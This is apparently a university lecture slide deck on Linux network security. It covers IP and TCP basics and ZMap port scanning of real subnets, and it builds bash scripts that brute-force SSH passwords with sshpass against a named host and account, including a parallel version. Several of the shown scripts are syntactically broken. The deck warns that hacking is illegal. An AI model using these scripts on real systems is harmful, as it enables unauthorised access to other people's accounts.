Network Security In Linux: Scanning and Hacking
Review Lex A lexical analyzer that tokenizes an input text. Yacc A parser that parses and acts based on defined grammar rules involving tokens. How to compile Lex and Yacc source files into an executable file.
Outline A naïve way to hack Background IP network TCP protocols Network scanning A script for infinite SSH login attempt.
Background Internet: A set of inter-connected networks Largely rely on the TCP/IP protocol IP : Internet Protocol Provide an address for information routing Data is segmented into packets. TCP : Transmission Control Protocol Over IP, control how to transmit IP packets, Port numbers: differentiate services.
IP Responsible for end to end transmission Sends data in individual packets Maximum size of packet is determined by the networks Fragmented if too large Unreliable Packets might be lost, corrupted, duplicated, delivered out of order
IP address IP address: 4 bytes e.g. 141.225.9.148 (csa.memphis.edu) Each device normally gets one In theory there are about 4 billion available A subnet: 4 bytes IP / [0~32] Represent a range of IP addresses e.g., 141.225.8.1/22 a subnet at UofM, including computers in Dunn Hall.
TCP port number A port number is an application-specific software construct serving as a communications endpoint in a computer's host operating system. 2 Bytes: 0 ~ 65535 Used to differentiate services. Examples: 21 FTP, 22 SSH, 23 Telnet, 80 HTTP, 443 HTTPS
How to connect to a machine You got an IP address, you know what you want Surfing web send packets with the destination IP and port number 80 SSH login send packets with the destination IP and port number 22 Then, wait for the data sent back.
Potential Risks As long as your machine has an IP and connect to the Internet, everyone can try to log in to your machine. FTP login SSH login Telnet login PHP login MySQL login Our focus here
How to SSH log in to a machine Steps: You need to know a machine has SSH service. You need a username and a password, Then, connect to the destination IP on port 22. Example: ssh comp4272@csa.memphis.edu The computer will create a packet consisting of The IP of csa.memphis.edu: 141.225.9.148 The port number of SSH: 22 The username: comp4272
Check if a machine supports SSH Port scanning Scan a subnet or the whole Internet to see which machines support SSH login. Implementation: Send a login packet to an IP with port 22, test if there is a response.
Scanning Tool in Linux ZMap A very recent tool. https://zmap.io/ Released in 2013. Installation: Download the source, compile and install. https://github.com/zmap/zmap Ubuntu/Mint: apt-get install zmap
ZMap Feature Fast can port scan the entire IPv4 address space from just one machine in under 1 hour.
Speed of ZMap vs Nmap Averages for scanning 1 million random hosts From ZMap authors slides
Internet wide results by ZMap (I) Find vulnerabilities upnp vulnerability disclosed by HD Moore, Jan 29 2013. Scan results in Feb: 15.7 million publicly accessible UPnP devices 3.4 million still vulnerable. ( ~22% )
Internet wide results by ZMap (2) Find service availability Outages during Hurricane Sandy, Oct-Nov 2012 More than 30% decrease From ZMap authors slides
Is port scan legal? DoS attacks Definitely break the law Hacking into someone s computer Definitely break the law Port scan Gray area? most likely prohibited by ISP. Detection systems can prevent port scan.
Response results to ZMap scan 200 Internet-wide scans Got response to exclude 3,753,899 addresses (~0.11% of the IP address space) From ZMap authors slides
ZMap for our use zmap p [port] [IP]/[mask] i [device] o [file] -p: specify a port number -i: can be omitted if you have just one network device -o: output all found IPs into a file Example: zmap p 22 141.225.8.1/22 i eth1 zmap p 22 141.225.9.1/24 i eth1
Exercise: do a port scan Scan subnet 141.225.8.1/22 with port 80. port 22.
Mission Suppose Tom has an account At a remote host: csa.memphis.edu Username: tom Passwords: don t know, but all numbers. Task: write a shell script to get the password
How to guess a password Create a dictionary try all passwords in the dictionary one by one How to create a dictionary: Non-trivial Social engineering What s the user s name? What s the user s birthday? What s the user s nickname?.
Guidelines to create a dictionary Some common things about our passwords People tend to write letters first, then numbers People tend to write special characters last.!, *, @, #, $, % People tend to use birthday, phone numbers, street numbers, zip code, Some people tend to use only numbers. Many people don t like uppercase, or put uppercase first.
A password with only numbers DON T use password that contains only numbers! Create a dictionary that contains all combinations of numbers. Try them one by one. #dict.txt 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
Try password We can manually try passwords in the dictionary one by one. Or, we can write a shell script to try all passwords. #dict.txt 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 csa.memphis.edu tom ssh port 22
sshpass Command ssh does not support automatic password entering: ssh tom@csa.memphis.edu You always need to enter the password manually. sshpass: support enter password in command line. Ubuntu/Mint install: apt-get install sshpass Usage: sshpass p [password] [orginal ssh command]
sshpass example sshpass -p "12812" ssh tom@csa.memphis.edu If success, it will log in. Otherwise, it will say Permission denied, please try again. Try more: sshpass -p "11111" ssh admin@csa.memphis.edu sshpass -p comp4272" ssh comp4272@csa.memphis.edu
Write a shell script trypassword The arguments of the script are First: IP Second: username Third: password Example:./trypassword csa.memphis.edu tom 1 The script tells you if the login is successful.
trypassword script #!/bin/bash # $1 - ip address to hack # $2 - username # $3 - password Any issue? sshpass -p "$3" ssh $2@$1 &> /dev/null if [ $? -eq 0 ]; then echo "Find the password: $3" exit 0 fi exit 1 /dev/null is a device file that discard all data written to it http://en.wikipedia.org/wiki/null_device
The correct script #!/bin/bash # $1 - ip address to hack # $2 - username # $3 - password echo exit sshpass -p "$3" ssh $2@$1 &> /dev/null if [ $? -eq 0 ]; then echo "Find the password: $3" exit 0 fi exit 1
Put trypassword in a loop trypassword offers one try. Our objective Try every password in the dictionary Put trypassword in a loop. Each time, we try one different password Until we find the correct password. Create a script runhacking
runhacking script #!/bin/bash ip=csa.memphis.edu username=tom dict=dict.txt for password in `cat $dict`; do echo "Try password: $password"./trypassword $ip $username $password if [ $? -eq 0 ]; then exit 0 fi done exit 1 Any issue? Are we done?
Speed up the process #!/bin/bash ip=csa.memphis.edu username=tom dict=dict.txt for password in `cat $dict`; do echo "Try password: $password"./trypassword $ip $username $password if [ $? -eq 0 ]; then exit 0 fi done exit 1 It will hang there and wait for the result!
Our current strategy server time... hacker time
A better strategy server time... hacker time
The new runhacking script #!/bin/bash ip=csa.memphis.edu username=tom dict=dict.txt for password in `cat $dict`; do echo "Try password: $password"./trypassword $ip $username $password & if [ $? -eq 0 ]; then exit 0 done exit 1 fi $? is always 0, how to handle this? & is to make the command run in background (a process will be created to run the command)
How to track status./trypassword./trypassword runhacking./trypassword How can we know a particular process finds the password in the runhacking script? multiple ways../trypassword
If find password, create a file #!/bin/bash # trypassword script: # $1 - ip address to hack # $2 - username # $3 - password # $4 - the filename to save the found password echo "exit" sshpass -p "$3" ssh $2@$1 &> /dev/null if [ $? -eq 0 ]; then echo "Find the password: $3" echo $3 > $4 exit 0 fi exit 1
The final runhacking script #!/bin/bash ip=csa.memphis.edu username=tom dict=dict.txt pwfile=password rm -f $pwfile for password in `cat $dict`; do echo "Try password: $password"./trypassword $ip $username $password $pwfile & done exit 1 # If the password file is created, we find it and exit if [ -f $pwfile ]; then exit 0 fi
Discussions Hacking is ILLEGAL! Running this script to connect to other s computer is illegal! The other s computer can have your IP record, then trace you back. You can try the script on csa.memphis.edu How to prevent this very naïve hacking?
Summary TCP/IP networks IP address and TCP port ZMap Very fast Internet scanner A naïve script to try passwords Hacking is ILLEGAL! How to defend?